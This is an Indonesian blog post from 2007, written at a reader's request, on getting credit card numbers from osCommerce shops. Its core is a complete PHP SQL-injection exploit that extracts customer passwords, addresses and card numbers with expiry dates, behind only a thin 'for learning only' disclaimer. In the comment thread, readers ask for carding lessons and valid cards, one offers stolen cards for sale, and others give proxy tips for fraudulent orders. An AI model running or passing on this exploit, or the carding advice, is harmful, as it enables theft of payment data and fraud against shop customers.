Mencari credit card number dengan osCommerce

Senin 23 April 2007

Hola,,

saya kembali lagi setelah liburan beberapa hari sehabis UAN. Dan setelah meng-approve beberapa comment yang pedas mengkritik saya, dengan lapang dada saya membalasnya dengan sopan akhirnya saya mencoba memenuhi permintaan dari seorang pengunjung yang meminta saya untuk memasukan artikel tentang bagaimana mendapatkan nomor kartu kredit atau CC untuk kepentingan pribadi tentunya.

PERHATIAN !!

Artikel ini hanya untuk pembelajaran saja untuk para webmaster. tidak ada yang berbahaya dalam artikel ini. Yang menjadikannya berbahaya adalah orang yang menggunakannya untuk kepentingan tidak baik saya tidak bertanggung jawab atas segala pengrusakan yang terjadi setelah anda membaca artikel ini


Cari CC dari osCommerceDapatkan CC Info dari bug osCommerce

————– Exploit Code ————-

#!/usr/bin/php -q -d short_open_tag=on
<?

error_reporting(0);
ini_set(“max_execution_time”,0);
ini_set(“default_socket_timeout”,5);

if ($argc<5) {
echo ” Exploit osCommerce < 2.2 Milestone 2 060817 “;
echo ” Usage: php “.$argv[0].” host path product_id whatinfo OPTIONS “;
echo ” host – target server (ip/hostname) “;
echo ” path – path to osCommerce “;
echo ” product_id – Valid product_id “;
echo ” whatinfo – pass for password, cc for credit card info, addr for address “;
echo “Options: “;
echo ” -D: Show debug or verbose on “;
echo ” -p[port]: specify a port other than 80 “;
echo ” -P[ip:port]: specify a proxy “;
echo “Example: “;
echo ” php “.$argv[0].” localhost /os2/catalog/ 2 pass “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 pass -p8080 -P192.168.1.108:3128 -D “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 cc -p8080 -P192.168.1.108:3128 “;
die;
}

$host=$argv[1];
$path=$argv[2];
$products_id=$argv[3];
$whatinfo=$argv[4];
$port=80;
$Debug=0;
$proxy=””;
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp==”-p”)
{
$port=str_replace(“-p”,””,$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(“-P”,””,$argv[$i]);
}
if ($temp==”-D”)
{
$tmp=str_replace(“-D”,””,$argv[$i]);
$Debug=1;
}
}

if (($path[0]<>´/´) or ($path[strlen($path)-1]<>´/´)) {echo ´Error… check the path!´; die;}

if($Debug==1) {
echo “Name : osCommerce Multiple Vulnerabilities “;
echo “Date : August 17, 2006 “;
echo “Vendor : osCommerce “;
echo “URL : http://www.oscommerce.com/ “;
echo “Version : osCommerce < 2.2 Milestone 2 060817 “;
echo “Risk : Multiple Vulnerabilities “;
echo “Exploit : Customers Info, Pass, and Credit Info Disclosure “;
echo “Author : Perseus “;
echo “Compatibility : magic_quotes_gpc off, union supported “;
echo “Greets : rgod, James Bercegay, str0ke, hdm, r57 “;
}

// try if you can rewrite this code to attack osc with magic_quotes_gpc on
// because I found it impossible for the moment.
// this will make oscommerce people update their vuln servers right now.

$proxy_regex = ´(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})´;
if ($proxy==´´) {$p=$path;} else {$p=´http://´.$host.´:´.$port.$path;}
$loop = 1000;

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex, $Debug;
if ($proxy==´´) {
if($Debug==1) echo ” Processing packets directly… “;
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ” No response from “.$host.”:”.$port.” “; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ´Not a valid proxy…´;die;
}
$parts=explode(´:´,$proxy);
if($Debug==1) echo ” Processing packets using proxy “.$parts[0].”:”.$parts[1].” … “;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ” No response from proxy… “;die;
}
}
fputs($ock,$packet);
if ($proxy==´´) {
$html=´´;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=´´;
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}

fclose($ock);
#debug
#echo ” “.$html;
}
$bl=0;
for($y=0;$y<=$loop;$y++) {
//1. get cookie
$out = “GET “.$p.”product_info.php?products_id=”.$products_id.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
$e = explode(“Set-Cookie: osCsid=”,$html);
$e2 = explode(“;”,$e[1]);
$cookie = $e2[0];

//2. injection
if($whatinfo==”pass”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, customers_password, ´^´, customers_email_address,´|´,customers_firstname,´|´,customers_lastname,´|´,customers_dob,´|´,customers_telephone, ´^´) , 0 , 0
FROM customers LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”addr”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, entry_company, ´^´, entry_firstname,´|´,entry_lastname,´|´,entry_street_address,´|´,entry_suburb,´|´,entry_postcode,´|´,entry_city,´|´,entry_state, ´^´) , 0 , 0
FROM address_book LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”cc”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, cc_type, ´^´, cc_owner,´|´,cc_number,´|´,cc_expires,´|´,billing_street_address,´|´,billing_suburb,´|´,billing_city,´|´,billing_postcode,´|´,billing_state,´|´,billing_country,´^´) , 0 , 0
FROM orders LIMIT “.$y.”,1 /*”;

}

$sql=urlencode($sql);
$data = “id[0]=”.$sql.””;
$data.=”&products_id=”.$products_id.””;
$out = “POST “.$p.”product_info.php?products_id=”.$products_id.”&action=add_product&osCsid=”.$cookie.” HTTP/1.0 “;
$out .= “User-Agent: Googlebot/2.1 “;
$out .= “Host: “.$host.” “;
$out .= “Accept: text/plain “;
$out .= “Connection: Close “;
$out .= “Content-Type: application/x-www-form-urlencoded “;
$out .= “Cookie: “.$cookie.” “;
$out .= “Content-Length: “.strlen($data).” “;
$out .= $data;
sendpacketii($out);

//3. get vals
$out = “GET “.$p.”shopping_cart.php?osCsid=”.$cookie.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
//echo $html;
$e = explode(“M||||”,$html);
$e2 = explode(“^”,$e[1]);
$str = ” “.$y.”. “.$e2[0].” “.$e2[1].” “;
echo $str;
$strl = strlen($str);
if($strl<=25) $bl++;
if($bl==3) break;

}

?>

——- End Code ———–

About sugoistanley

Me is just another ordinary boy in this world....Iam not a hacker but i believe someday I Will...

Posted on April 23, 2007, in Hacking. Bookmark the permalink. 71 Comments.

  1. tuh code trus diapain nie,,bingung…

  2. tulis juga langkah langkahnya

  3. aku blm mengerti caranya gimana soale aku masih dasar
    n tolong jelasin langkah2nya yg teratur jgn langsung inti ok thanks

  4. heee…e jelasin dunk langkah2nya!!

  5. waalah gini ni klo kasih setengah setengah, klo kgk ikhlas mending kgk usah di share kang

  6. Wedewww Om om
    #!/usr/bin/php -q -d short_open_tag=on

  7. 🙂 only smile

  8. om bisa nyariiin situs yang nampilin hasil uan g,

    Please..

  9. Bingung bos!!

  10. kagak ngerti apa maksudnya kang

  11. troxix66 Corp.

    mo ngerti ya belajar language program dulu toh masnyaaa, emangnya mi instant!

  12. kang gimana tuh langkah-langkahnya jadi bingung!!

  13. bro2 klo mo carding jangan asl enak n gratis…biasanya klo yg gratis emang seh gampang tapi hasilnya 0…gw lebih baik bro coba cari temen yg bisa di ajak carding….klo bro2 mo carding lakuin dgn membentuk tim…dan biasanya carding yg dalam bentuk tim bisa dapet uang 1 bln lbh dari $10.000…dan g bkl ketangkep deh….

  14. carane piye bos?

  15. Ajarin Bung Soalnya aku masih penasaran,please senfd email to me.Thanks

  16. bro ajarin dong… pendatang baru nich

  17. aduhhh…mumet!!step2 dasarnya jg ditulis

  18. om, saya punya cc Visa masi valid bgt,uda saya tes di webnya Visa langsung,n bisa diproses…tp kok bwt order ga bisa trus ya,katanya ip nya klo pke ip indonesia di tolak ya??????
    gmn caranya ganti ip nya om????

  19. pake proxy.. itu juga gw di ajarin…

  20. master kalo emang niat,,,,,,,,,,,,
    tunjukin dung langsung daptar nomor kartu creditnya langsung
    pujeng

  21. dasar katro wong ndeso.gitu aja nggak ngerti.emang apanya yang nggak ngerti.kode mirip togel aja nggak ngerti.sebenernya saya mau tanya ada gak yang bisa bantu sama kode diatas.tolong bagi2 sama saya juga.

  22. hummm… mo belajar jadi penjahat ya?😛

  23. aduh, kalo ada yang punya cc valid bisa pake Proxy luar, dan setau sy klo pengen gampang ya ordernya dalam bentuk account member, ebooks, reg key, etc.

  24. Walah walah, jadi ajang pamer kepandaian segelintir cecunguk cecunguk , reaksinya sih senyam senyum kaya orang pinter gitu , ngga tahu asli pinter apa pura2, ngepet dah … berbelit

  25. yah begitulah masyarakat indonesia bung,
    maklumi saja😀

    ~ sugoistanley ~

  26. Lha sampean juga orang Indonesia je🙂

  27. bro..!bisa minta no acc nya nggak..???makasih sblumnya di kirim aja ke email ku..makasihh

  28. bila anda mau info cc lengkap dan valid!! anda bisa mendapatkannya, saya punya cc lengkap dan valid. silahkan anda mentransfer ke rekening e-gold saya sebagai ganti uang lelah cuma $25 ke account e-gold 4656188.cukup murah karena nominal dari cc yg akan saya berikan sebesar diatas $1000. setelah anda transfer segera konfirmasikan transferans anda lewat e-mail saya Odiek00@yahoo.com maximal 1×24 jam stlh pentransferan ke e-gold saya info cc akan sampai ke e-mail anda. ok terima kasih

  29. bos gimana cara nya

  30. jsncok, gak ngerti maksude le!!!!!

  31. wah jadi ajang smile di sini mo dong azjrin gw carding…

  32. yg punya cc valid, aq tukerin toko yg bisa kirim indonesia.. el.rastafara@ gmail.com

  33. sedih bgt nasib orang2 yg mau belajar kyk gw ni. Kagak ngerti…. jelasin dong!!

  34. woro2 gw pnya virtual proxy, msh setaun boz..
    tukeran ama cc yg msh aktip N valid jg dunk..
    send to muztood@yahoo.com

  35. @anjink liar

    yg kayak gitu saya jg sudah punya banyak bung!
    sayang CC saya ah!

    saya pake sendiri ajah :D!

  36. hey wong
    da les privatnya ga?
    gi aku mo les serius nee
    hub aku 085853067317

  37. halo pakbr aku feery mau mencari cartu card untuk cc buat nelpon ke yahoo ad yg bs g aku mn tlg

  38. susah man….

  39. kk mnt cc yg valid donk tuk nelpon dr yahoo aja kok ga tuk yg lain kn ga bnyk cuman $10-@25 aja kok pliz krm ke email aq ya pencinta_wanita93@yahoo.com

  40. waahhh kllo carding gw rada gimana gitu..
    tapi klo mo hosting ke TheJavu aja ..
    heee.. hee… promosi nichhh

  41. wah mas, kodenya ada yang salah tu

  42. wah mau dong!!!!! ajarin dong!!!!! btw ada yg mo beli sitegameku gak????

    http://www.justclickandshot.com
    http://www.restinfun.com

    tawar aja!!!!

  43. kalo mo ngerjain bukan begini caranya coy… sok pinter!!

  44. daripada pusing gak bisa berbuat jahat lebih baik bertobat, … kiamat dah dekat…. kita semua pasti akan mati dan dimintai pertanggung jawaban atas segala yang pernah kita perbuat selama hidup di dunia.

    semoga kita semua mendapat Hidayah-Nya Amin.:)

  45. tuh caranya gmana? pless duung

  46. Hallo swma….
    Yg punya cc valid bagi dunks…. Perlu banget nich. Ga banyak koq cuma $10 doank. Ya….
    Tolong kirim ke malaikat.kebingungan@gmail.com
    Thanks alll…….

  47. Hayyoooo….hayooooo….rame rame jadi hacker elite..sapa yang punya elmunya disharing dwong kalo ada situsna diposting diajarin step by step biar yang newbie jadi manteb biar indonesia dihargai..’bab indonesia udah ancwuorr di segala bidang..hix.MERDEKA!!!(belom deng…hi..hi..hi)

  48. hah.. uda lama ip indo di black list klo mesen barang luar.. jadi klo dapet cc valid yah
    1. klo ada kenalan di luar negeri ya bagus.. ga usa jau2 malaysia ok kok..
    2. mo ga mo proxy anonym

    oscommerce rada berat nembusinnya ni… uda seharian ga lewat2… tp ada bbrp orang bodoh di indonesia yg make oscommerce tapi ga make halaman login dolo buat masuk ke admin panelnya… hanya ada 1 kata buat orang kek gini “SELAMAT”

  49. om yang jelas donk, aku kan g ngerti, maklum masih baru!!

  50. kapan anak2 indonesia bisa maju n menjajah amerika kalo cc aja di komersilkan??????

  51. om om yg baik …
    diatas itu PHP script .namanya….
    web programing gitu , isinya mencari cookies(atau sisa transaksi ) dari server orang, yg bisa berupa nomor CC dan berbagai jenis Trans lainnya.
    tapi itu gak langsung jalan…… plng tidak anda harus belajar PHP dulu, ngerti syntax nya dan urutan perintahnya . dan ingat hampir semua server dilengkapi firewall, jadi menggunakannya harus berkali-kali …..ok .NO RISK NO GAIN . begitu kata pepatah ! bravo carder Indonesia

  52. hajar jon………

  53. Wah…..bagus juga artikel nya.. bagus buat gw kutip di web gw, biar menarik orang berkunjung dan betah mikirin tuh script, ga tau juga tuh script kerja pa kaga. kalo bisa napa mesti tanggung ngasih tau ama orng.biar pembelajarn nya tuntas and klo emang setengah setengah mending ga usah deh….
    biar orng yang baca ga …mikirin tuh script mesti di gimanain. bagus ngasih script laen.

  54. KK ajarin saya privatenya donk

    butuh bgt nih

    nih no hp saya 0819 321 323 90

    makasih banget

    itu atas masih gk ngerti

  55. kk bole minta fresh cc nya g..??
    ini cuma buat beli mall points game koq…
    didomuach@aol.com

  56. ck ck ck,….
    script apaan tuh…?
    -????????????-
    bingung
    dirubah ke html kagak bisa
    di apa2in juga gak bisa
    payah…
    hahahaha

  57. ManTaFF.. Bro..

    Ok.. teruslah mencoba.. Semua ada ilmunya..

    “Notes: Tapi nek sing kaya nang nduwur yo mbingungi.. iku perl opo racikan jamu GendonG to?”

    SaLam OLaH RaGa.!

  58. makenya gmn tu bos???? jlimet euy?????

  59. Ada cara laen yang lebih gampang ga’ mas?????

  60. Jancok Jaran Kabeh..
    Persetan Dengan Orang2 Yang Mengkomersilkan Barang2 Dari Negara KAPITALIS..GO TO HELL!!

    JANCOK JARAN!!

  61. mangus – mangus!!! salut lah palalinter euy….
    cing bagi CC atuh….,nanti saya kasih elmu anyar
    Dari Sunda mau kaga….

  62. hmm…PHP gitu toh…weleh….gak jalan tuh boss..ada yang salah script nya…just check lagi…heheheeeeee….

  63. Jamput!!!!
    Blajar cracking dulu dong!
    Dasar newbie & lamer, monya kaya dadakan ga pake mikir….
    Mental gembel!

  64. aq jg mau donk diajarin nich boss
    coalna masi amatiran
    tar kl ada rejeki halal aq bagi2 buat bos deh via atm oc bos

  65. program gituan di pake
    udah jadul kali…
    emang nggk ada cara lain aja…
    kalau mau cara baru kirim pesan ke email gue aja..
    ” Jaya Selalu Carding Indonesia..!!! “

  66. telembokne rak mudeng babar blas!

    kuntul ah!

    ajarin aso !!

  67. GUOBLOK
    CARANE TRUS PIE COK?
    NEK COPAS AE AKU YO ISO

    KONTOL!

  68. Dari pada carding, mending belajar cari duit, biar ga’ usah carding-carding-an!!!!

  69. nice blog, carding jangan, cari duit oke lah mampir yach http://widibag.us

  70. DOWNLOAD gratis scrip TOKO ONLINE PREMIUM bisa langsung di pakai, berbasis cms oscommerce klik http://osc.kreatiif.com/ masuk ke menu download.

    anda juga bisa memesan semua scrip, yang ada di web ini, yang akan di kirim ke rumah anda dalam paket 2CD
    koleksi scrip toko online oscommerce | Koleksi scrip toko online Premium CMS oscommerce di Obral Murah

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s